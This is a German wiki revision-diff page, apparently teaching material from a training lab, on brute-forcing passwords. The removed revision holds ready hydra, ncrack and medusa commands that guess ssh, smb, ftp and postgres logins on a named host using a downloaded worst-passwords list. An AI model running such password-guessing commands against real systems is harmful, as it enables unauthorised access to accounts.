Bruteforce-passwords: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(3 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
 
=Get the passwords=
 
=Get the passwords=
 
*wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/500-worst-passwords.txt
 
*wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/500-worst-passwords.txt
 
+
=Labor Liste=
=ncrack=
+
*wget https://www.xinux.de/downloads/share/bad-passwords
*ncrack -p 22  --user dummy  -P 500-worst-passwords.txt bortus.tuxmen.de
+
*[[ncrack]]
=hydra=
+
*[[hydra]]
==ssh==
+
*[[medusa]]
*hydra -l dummy -P 500-worst-passwords.txt  bortus.tuxmen.de ssh
 
==smb==
 
*hydra -l dummy -P 500-worst-passwords.txt  bortus.tuxmen.de smb
 
==ftp==
 
*hydra -l dummy -P 500-worst-passwords.txt  bortus.tuxmen.de ftp
 
 
 
=medusa=
 
=ssh=
 
*medusa -u dummy  -P 500-worst-passwords.txt -h bortus.tuxmen.de  -M ssh
 
=postgres=
 
*medusa -u dummy -P 500-worst-passwords.txt -h bortus.tuxmen.de -M postgres
 
  
 
=Avoid Brute Force=
 
=Avoid Brute Force=

Aktuelle Version vom 3. August 2021, 15:26 Uhr